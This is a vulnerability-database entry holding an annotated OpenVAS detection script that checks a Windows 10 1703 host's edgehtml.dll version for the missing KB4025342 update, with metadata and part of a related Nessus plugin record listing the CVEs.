Microsoft Windows Multiple Vulnerabilities (KB4025342)
2017-07-12T00:00:00
ID OPENVAS:1361412562310811465 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2020-06-04T00:00:00
Description
This host is missing a critical security update, according to Microsoft KB4025342.
###############################################################################
# OpenVAS Vulnerability Test
#
# Microsoft Windows Multiple Vulnerabilities (KB4025342)
#
# Authors:
# Kashinath T <tkashinath@secpod.com>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Description phase: when the scanner sets `description`, only the metadata
# below is registered; the exit(0) that closes this block returns before any
# of the host-check code further down is reached.
if(description)
{
# Identity of this test (OID) and the revision timestamp of the script.
script_oid("1.3.6.1.4.1.25623.1.0.811465");
script_version("2020-06-04T12:11:49+0000");
# CVE and Bugtraq identifiers attached to a finding. None of them is tested
# individually: the check in this script compares one file version
# (edgehtml.dll) and reports the whole list when that version is in range.
script_cve_id("CVE-2017-8596", "CVE-2017-8598", "CVE-2017-8599", "CVE-2017-8601",
"CVE-2017-8602", "CVE-2017-8603", "CVE-2017-8604", "CVE-2017-0170",
"CVE-2017-8463", "CVE-2017-8605", "CVE-2017-8606", "CVE-2017-8607",
"CVE-2017-8467", "CVE-2017-8486", "CVE-2017-8608", "CVE-2017-8609",
"CVE-2017-8610", "CVE-2017-8611", "CVE-2017-8617", "CVE-2017-8618",
"CVE-2017-8619", "CVE-2017-8495", "CVE-2017-8556", "CVE-2017-8557",
"CVE-2017-8561", "CVE-2017-8562", "CVE-2017-8563", "CVE-2017-8564",
"CVE-2017-8565", "CVE-2017-8566", "CVE-2017-8573", "CVE-2017-8574",
"CVE-2017-8577", "CVE-2017-8578", "CVE-2017-8580", "CVE-2017-8581",
"CVE-2017-8582", "CVE-2017-8585", "CVE-2017-8588", "CVE-2017-8589",
"CVE-2017-8590", "CVE-2017-8592");
script_bugtraq_id(99405, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,
99408, 99410, 99409, 99414, 99412, 99418, 99415, 99391, 99422,
99399, 99392, 99424, 99439, 99398, 99426, 99397, 99402, 99428,
99394, 99404, 99431, 99438, 99416, 99419, 99421, 99423, 99429,
99432, 99400, 99425, 99427, 99396);
# A single CVSS v2 base score and vector for the whole bundle of CVEs above.
# Per-CVE severity is not expressed here, so triage of an individual CVE has
# to use that CVE's own rating rather than this value.
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)");
script_tag(name:"creation_date", value:"2017-07-12 10:08:33 +0530 (Wed, 12 Jul 2017)");
script_name("Microsoft Windows Multiple Vulnerabilities (KB4025342)");
# Report texts. These strings are emitted verbatim in scan results.
script_tag(name:"summary", value:"This host is missing a critical security
update according to Microsoft KB4025342");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Multiple flaw exists due to,
- Microsoft Windows fails to properly handle objects in memory.
- The way that the Scripting Engine renders when handling objects in memory
in Microsoft browsers.
- The way JavaScript engines render when handling objects in memory in
Microsoft browsers.
- The way Microsoft Edge handles objects in memory.
- When Windows Explorer improperly handles executable files and shares during
rename operations.
- when an affected Microsoft browser does not properly parse HTTP content.
- when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).
- When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as
the default authentication protocol.
- The way that the Windows Kernel handles objects in memory.
- The Microsoft Graphics Component fails to properly handle
objects in memory.");
script_tag(name:"impact", value:"Successful exploitation will allow an attacker
who successfully exploited the vulnerability to gain the same user rights as
the current user, run arbitrary code, processes with elevated privileges.
Also could take control of the affected system and cause a denial of service.");
# Scope stated to the reader: Windows 10 Version 1703 only.
script_tag(name:"affected", value:"Microsoft Windows 10 Version 1703 x32/x64.");
script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");
script_tag(name:"solution_type", value:"VendorFix");
# qod_type records how the result is obtained: here from the version of an
# executable file read on the target, not from a banner or a remote probe.
script_tag(name:"qod_type", value:"executable_version");
script_xref(name:"URL", value:"https://support.microsoft.com/en-us/help/4025342");
# Information-gathering category: the script only reads data from the host.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Windows : Microsoft Bulletins");
# Run conditions: scheduled after smb_reg_service_pack.nasl, with SMB ports
# 139/445 declared as required and the knowledge-base key SMB/WindowsVersion
# mandatory.
# NOTE(review): presumably that key is only set after a successful
# authenticated SMB/registry login - confirm in the dependency. If so, a host
# scanned without working credentials yields no result from this script, and
# that absence must not be read as "patched".
script_dependencies("smb_reg_service_pack.nasl");
script_require_ports(139, 445);
script_mandatory_keys("SMB/WindowsVersion");
exit(0);
}
include("smb_nt.inc");
include("secpod_reg.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
# Host check: report KB4025342 as missing when the edgehtml.dll found in the
# system32 directory carries a file version inside the vulnerable range.
#
# Every path that does not report ends in exit(0), so "not Windows 10",
# "file or version could not be read" and "version is outside the range" all
# look the same in the results. The absence of a finding is therefore not
# proof that the update is installed.

# OS gate: stop unless the helper recognises the host as Windows 10 (32- or
# 64-bit). NOTE(review): presumably this matches any Windows 10 release, not
# only Version 1703 - confirm in secpod_reg.inc.
if(hotfix_check_sp(win10:1, win10x64:1) <= 0)
  exit(0);

# Locate the system32 directory; give up silently when it is not available.
system32Dir = smb_get_system32root();
if(!system32Dir)
  exit(0);

# edgehtml.dll is the only file inspected. Its version is used as the
# indicator for the whole cumulative update and all CVEs listed in the
# description block.
edgeHtmlVer = fetch_file_version(sysPath:system32Dir, file_name:"edgehtml.dll");
if(!edgeHtmlVer)
  exit(0);

# The range stays inside the 11.0.15063.x branch, which is what ties a finding
# to the "affected" tag (Windows 10 Version 1703). Bounds are presumably
# inclusive - confirm in version_func.inc.
if(!version_in_range(version:edgeHtmlVer, test_version:"11.0.15063.0", test_version2:"11.0.15063.482"))
  exit(0);

# Evidence for the analyst: the file, the version read and the range it fell
# into. The double-quoted piece keeps its backslash literally; the
# single-quoted '\n' pieces are real line breaks.
findingText = 'File checked: ' + system32Dir + "\Edgehtml.dll" + '\n' +
              'File version: ' + edgeHtmlVer + '\n' +
              'Vulnerable range: 11.0.15063.0 - 11.0.15063.482\n';
security_message(data:findingText);
exit(0);
{"id": "OPENVAS:1361412562310811465", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025342)", "description": "This host is missing a critical security\n update according to Microsoft KB4025342", "published": "2017-07-12T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811465", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-us/help/4025342"], "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "lastseen": "2020-06-08T23:26:07", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS17_JUL_4025338.NASL", "SMB_NT_MS17_JUL_INTERNET_EXPLORER.NASL", "SMB_NT_MS17_JUL_4025344.NASL", "SMB_NT_MS17_JUL_4025342.NASL", "SMB_NT_MS17_JUL_4025341.NASL", "SMB_NT_MS17_JUL_WIN2008.NASL", "SMB_NT_MS17_JUL_4025336.NASL", "SMB_NT_MS17_JUL_4025339.NASL", "SMB_NT_MS17_JUL_WIN2012.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811456", "OPENVAS:1361412562310811224", "OPENVAS:1361412562310811516", "OPENVAS:1361412562310811464", "OPENVAS:1361412562310811519", "OPENVAS:1361412562310811517", "OPENVAS:1361412562310811515", 
"OPENVAS:1361412562310811518", "OPENVAS:1361412562310811461"]}, {"type": "kaspersky", "idList": ["KLA11070", "KLA11900", "KLA11067"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7FDC117533451294884ABE03F31ED36B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "cve", "idList": ["CVE-2017-8463", "CVE-2017-8588", "CVE-2017-8599", "CVE-2017-8556", "CVE-2017-8486", "CVE-2017-8604", "CVE-2017-8561", "CVE-2017-8603", "CVE-2017-8585", "CVE-2017-8581"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1C37EC4D058873085167AA48C6A7233A"]}, {"type": "symantec", "idList": ["SMNTC-99406", "SMNTC-99389", "SMNTC-99404", "SMNTC-99426", "SMNTC-99424", "SMNTC-99391", "SMNTC-99400", "SMNTC-99427", "SMNTC-99397", "SMNTC-99393"]}, {"type": "seebug", "idList": ["SSV:96315"]}, {"type": "mskb", "idList": ["KB4025342"]}], "modified": "2020-06-08T23:26:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-06-08T23:26:07", "rev": 2}, "vulnersScore": 7.8}, "pluginID": "1361412562310811465", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025342)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811465\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8596\", \"CVE-2017-8598\", \"CVE-2017-8599\", \"CVE-2017-8601\",\n \"CVE-2017-8602\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\", \"CVE-2017-8607\",\n \"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8608\", \"CVE-2017-8609\",\n \"CVE-2017-8610\", \"CVE-2017-8611\", \"CVE-2017-8617\", \"CVE-2017-8618\",\n \"CVE-2017-8619\", \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\",\n \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\",\n \"CVE-2017-8565\", \"CVE-2017-8566\", \"CVE-2017-8573\", \"CVE-2017-8574\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8588\", \"CVE-2017-8589\",\n \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99405, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,\n 99408, 99410, 99409, 99414, 99412, 99418, 99415, 99391, 99422,\n 99399, 99392, 99424, 99439, 99398, 99426, 99397, 99402, 99428,\n 99394, 99404, 99431, 99438, 99416, 99419, 99421, 99423, 99429,\n 99432, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:08:33 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities 
(KB4025342)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025342\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to gain the same user rights as\n the current user, run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025342\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.482\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.482\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "naslFamily": "Windows : Microsoft Bulletins"}
{"nessus": [{"lastseen": "2020-08-19T05:12:43", "description": "The remote Windows 10 version 1703 host is missing security update\nKB4025342. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. 
(CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. 
An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. 
(CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8598, CVE-2017-8603, CVE-2017-8604,\n CVE-2017-8605, CVE-2017-8610, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8617)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025342: Windows 10 Version 1703 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025342.NASL", "href": "https://www.tenable.com/plugins/nessus/101368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101368);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8566\",\n \"CVE-2017-8573\",\n \"CVE-2017-8574\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n 
\"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8596\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8610\",\n \"CVE-2017-8611\",\n \"CVE-2017-8617\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99404,\n 99405,\n 99406,\n 99407,\n 99408,\n 99409,\n 99410,\n 99412,\n 99414,\n 99415,\n 99416,\n 99417,\n 99418,\n 99419,\n 99420,\n 99421,\n 99422,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99438,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025342\");\n script_xref(name:\"MSFT\", value:\"MS17-4025342\");\n\n script_name(english:\"KB4025342: Windows 10 Version 1703 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4025342. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. 
(CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. 
(CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a 